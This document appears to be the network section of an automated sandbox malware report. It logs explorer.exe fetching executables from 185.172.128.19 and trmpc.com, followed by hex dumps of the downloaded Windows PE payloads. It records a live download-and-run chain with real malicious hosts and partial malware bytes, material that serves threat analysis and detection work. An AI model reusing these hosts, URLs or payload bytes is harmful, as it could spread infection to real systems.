                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796066046 CET1286INData Raw: 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: `DATAL@BSS.idataP@.tls.rdata@P.reloc
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796082020 CET1286INData Raw: 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff 8b 43 08
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ^[PQ8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$+
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796101093 CET1286INData Raw: ff ff 83 7c 24 0c 00 0f 85 66 ff ff ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: |$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$|$tT$L@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796118021 CET1286INData Raw: 00 00 7f 30 8b d6 c1 ea 02 a1 74 c4 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 1d 68 c4
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0t@Dut@\[:CZ,<|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)G
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796133995 CET1286INData Raw: 00 00 e9 9e 00 00 00 03 da 8b f0 e8 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 89 45 fc e8 e9 0c 00 00 e9 85 00 00 00 8b 10
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ;=p@u,)p@l@=l@<~3Et}@7)xt8tx}@P;@E3ZYYdh"@=2@th@E_^[Y]SVWU}
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796149969 CET1286INData Raw: 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fut|Y12_^[F~[)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796164989 CET1286INData Raw: 8b 15 0c c0 40 00 85 d2 0f 84 8b 00 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c 24 28 e8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: @T$D$HHS1VWUdSPRQT$(jPhy,@RS|$(o_G,@RA_D$@8tr@u@T$SVWUJYq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796181917 CET1286INData Raw: b8 e2 00 00 00 e8 05 0d 00 00 eb 0c 53 a1 d0 c3 40 00 50 e8 ca e0 ff ff 89 1d 8c c4 40 00 5b c3 8b c0 8a 0d 30 c0 40 00 8b 05 d0 c3 40 00 84 c9 75 28 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 c0 74 01
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: S@P@[0@@u(d,@Pt@PzttJI|JuBSVtJI|JuBNu^[t#JAPRBXXRH|ZXJtJI|JuB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796199083 CET1286INData Raw: 00 68 00 08 00 00 8d 44 24 0c 50 53 57 6a 00 6a 00 e8 ce db ff ff 8b c8 8b d4 8b c6 e8 1f fc ff ff eb 33 6a 00 6a 00 6a 00 6a 00 53 57 6a 00 6a 00 e8 ae db ff ff 8b e8 8b c6 8b cd 33 d2 e8 fd fb ff ff 6a 00 6a 00 55 8b 06 50 53 57 6a 00 6a 00 e8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hD$PSWjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:27.796724081 CET1286INData Raw: 6a 00 ff 36 e8 5d d6 ff ff 40 0f 84 c9 00 00 00 2d 81 00 00 00 73 02 33 c0 6a 00 6a 00 50 ff 36 e8 79 d6 ff ff 40 0f 84 ad 00 00 00 6a 00 8b d4 6a 00 52 68 80 00 00 00 8d 96 4c 01 00 00 52 ff 36 e8 40 d6 ff ff 5a 48 0f 85 8b 00 00 00 33 c0 3b c2
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: j6]@-s3jjP6y@jjRhLR6@ZH3;sLLt@jj+P6/@tg6Hu]"F$O:@~tjjt;~t6tuF R:@3^6sFiFLH3


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                2192.168.2.649716185.172.128.19804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.224143028 CET189OUTGET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.19
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.426954031 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 9104384
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65bd14a7-8aec00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 01
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELe @ `@`K @@ H.text `.rsrc@ @@.reloc@@BH'0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&*0/ssso,oo*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.426971912 CET1286INData Raw: 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a 0e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0(i+i]aXi2*6((+**0c (~-s~(+(++ i]XX _(X 2*(!*0w{X _}{
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427083015 CET1286INData Raw: dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 02 00 0b 00 b3 be 00 0a 00 00 00 00 13 30 01 00 18 00 00 00 0c 00 00 11 72 49 02 00 70 28 12 00 00 06 0a 12 00 28 49 00 00 0a 2c 02 17
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: **(0rIp((I,**0(JoK(&*06(L(M((L(MYj/&**//(!*lSystem.Re
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427108049 CET1286INData Raw: 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnx
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427129984 CET1286INData Raw: 4b 07 ce 01 ff 8e 15 2a 70 ee 00 fb ff 11 75 67 89 47 f8 b3 45 cb 00 72 00 32 8b 34 f8 67 05 a2 d5 f9 00 34 81 8b db 46 06 32 7c ea 6a 09 5f b3 3d 05 d6 e7 00 e8 00 78 00 06 1f 1c e0 83 80 32 68 db b1 f2 00 cd 15 29 70 e6 00 e3 85 90 fb 8c ff 24
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: K*pugGEr24g4F2|j_=x2h)p$Vd'CrOGmt_l[ffna2PVr2(5V]=22d2qji^t\,\P(\bQ\UDX|;tX6fX6.3XjsX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427153111 CET1286INData Raw: f6 0c 27 84 c2 74 00 cd 00 46 12 c4 c2 72 00 32 ff 05 02 8d c7 e7 17 f3 44 57 08 2b c3 54 89 25 8b 77 24 7a c6 75 02 71 5f a5 66 e7 17 f3 44 57 08 2b c3 ba 17 b9 44 17 08 2d c3 fe cc bd cc aa cc a2 cc c2 9a a3 80 74 e9 15 12 32 00 89 ba a2 80 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 'tFr2DW+T%w$zuq_fDW+D-t2223qg]e`2UPs237aoV*2Yd2tnjxs-73}qUf
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427179098 CET1286INData Raw: e2 b2 00 9a b1 15 00 71 a3 42 1f ef 00 90 f9 55 00 74 85 f2 7d 3a 6a 3b e8 0c 0e 32 00 28 e8 df 24 6e 00 fd c0 0e 08 1e 09 da 6d 3c 00 33 59 21 e8 17 0f 71 00 3f 3b a8 74 7f 50 9b 5b 7a 00 32 59 da 50 17 00 72 84 6f c4 05 06 69 b7 23 c8 93 03 19
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: qBUt}:j;2($nm<3Y!q?;tP[z2YProi#-QbVZ3@r2E9$2b25E{}bQP2Y(e=EO2u5P"qnEwAre+22/r1fyQx2}@2]!
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427200079 CET1286INData Raw: 81 8c 00 7b 00 73 83 be 7f 54 89 66 24 35 d9 1e 24 34 c3 d8 00 66 08 6e 74 7e b8 74 00 74 00 f1 dc 37 d0 49 80 72 b8 33 00 71 00 a5 8b 2c 04 5d 00 73 f0 0b 3d 32 00 c2 7f 47 03 af 02 f1 8b 33 04 e5 ec 64 0d 78 00 8c 7f fd 44 16 06 b9 42 37 8b 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: {sTf$5$4fnt~tt7Ir3q,]s=2G3dxDB7xzD\P$9r2BbD\VtM=25$nD$,ZffLdtpfStaT qfx),Z5$b]s&Vv$uKxtI=2G_6$=
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427222013 CET1286INData Raw: 3d 32 00 ee 5d 8a dd 77 08 28 dc 3b f8 37 df 98 f6 b7 44 0e 0e 64 53 da f0 0d 00 72 dd 77 f8 28 59 8d 22 98 c3 58 75 9e dd 31 f8 61 83 de 10 ee 5c 56 08 ef 45 79 dd 7a 24 04 0c 12 10 9b 87 48 00 32 83 f6 1c 6d 5b bb c3 fe cc bd cc aa cc a2 cc be
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =2]w(;7DdSrw(Y"Xu1a\VEyz$H2m[3xF{fn=raAGdmr2t=s239t8F3rr2-3UtS@3n1@n:
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427246094 CET1286INData Raw: e8 f9 3d 6e 00 21 c3 f8 ff 21 8b de 56 b9 f0 d8 0b f9 06 b7 c0 05 02 99 d0 ed c6 7c 3b 06 08 06 f0 6c 5d f1 8b cc 55 f9 ec 64 8b 04 08 55 c0 85 0f fd c0 06 10 ff 0e b7 c9 46 02 cc d1 f1 c6 36 3b 04 0c 14 ec 30 5d bb 8b 8c 55 ff ec b1 3d f2 7a b3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =n!!V|;l]UdUF6;0]U=zrt+hz2sYFu;gHqY#AxhqZhC3(YB;@t;J2`2u$qcp3+t)h2sYFXY]%2 rX[nYeGq9/h,rq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.629786968 CET1286INData Raw: 0b 46 05 b1 fb 37 75 63 8b 77 d4 f8 47 06 83 95 08 0d 06 f8 45 a4 89 75 64 01 c0 db 92 6e 00 32 c3 fa ff 33 8b 82 51 29 53 f8 5d 7c 56 65 33 c4 33 cc 89 0f fc 09 1c 8c 10 b7 80 6e 74 71 47 fa 7d 88 83 cd 17 40 ee b0 ff 65 0f b1 77 70 00 66 6a 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: F7ucwGEudn23Q)S]|Ve33ntqG}@ewpfjm)Ms-=rX@+nY=23qnxAu2h1qSqxW82dV'V0x`h62m2V saB2uThlxVb82!P6P>s


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                3192.168.2.6497252.180.10.7804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.408946991 CET162OUTGET /check/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Host: trmpc.com
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.942852020 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.24.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=6f897021.exe
                                                                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 fb 96 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 02 00 00 48 03 00 00 00 00 00 7f 24 00 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 6b 7c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc e2 02 00 64 00 00 00 00 20 04 00 78 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 91 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 db 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 16 7a 02 00 00 10 00 00 00 7c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 5c 00 00 00 90 02 00 00 5e 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 25 01 00 00 f0 02 00 00 52 00 00 00 de 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 a4 01 00 00 20 04 00 00 a6 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc|H$@k|d x@.textz| `.rdata\^@@.datad%R@.rsrcx 0@@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.942889929 CET212INData Raw: 24 24 39 bd a4 38 c7 44 24 28 b4 42 cb 30 c7 44 24 20 d5 b2 90 7f c7 44 24 48 86 5c 31 03 c7 44 24 2c 68 82 32 3b c7 44 24 44 fa 05 9b 5c c7 44 24 3c 2d c3 af 4c c7 44 24 40 2b 93 87 6f c7 44 24 38 00 c8 e5 0e c7 44 24 14 61 2a 78 12 c7 44 24 50
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: $$98D$(B0D$ D$H\1D$,h2;D$D\D$<-LD$@+oD$8D$a*xD$PXPD$aMD$hu0i[d$D$2i<d$4D$4D$TD$x:ed$D$l$<D$4:fD$4Pvl$Lb*Fl$D$Dl$$Y
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.942926884 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6c 58 6a 6d 66 a3 4a f9 43 00 58 6a 67 66 a3 3e f9 43 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: jlXjmfJCXjgf>CXjdf@CXjlfHC3fNCXj.fLCXj2fFCXjmfDCXjif8CXj3f<CXjsfBCXh8Cf:C$B4U<ESXV0W3=4CuuWPW4B
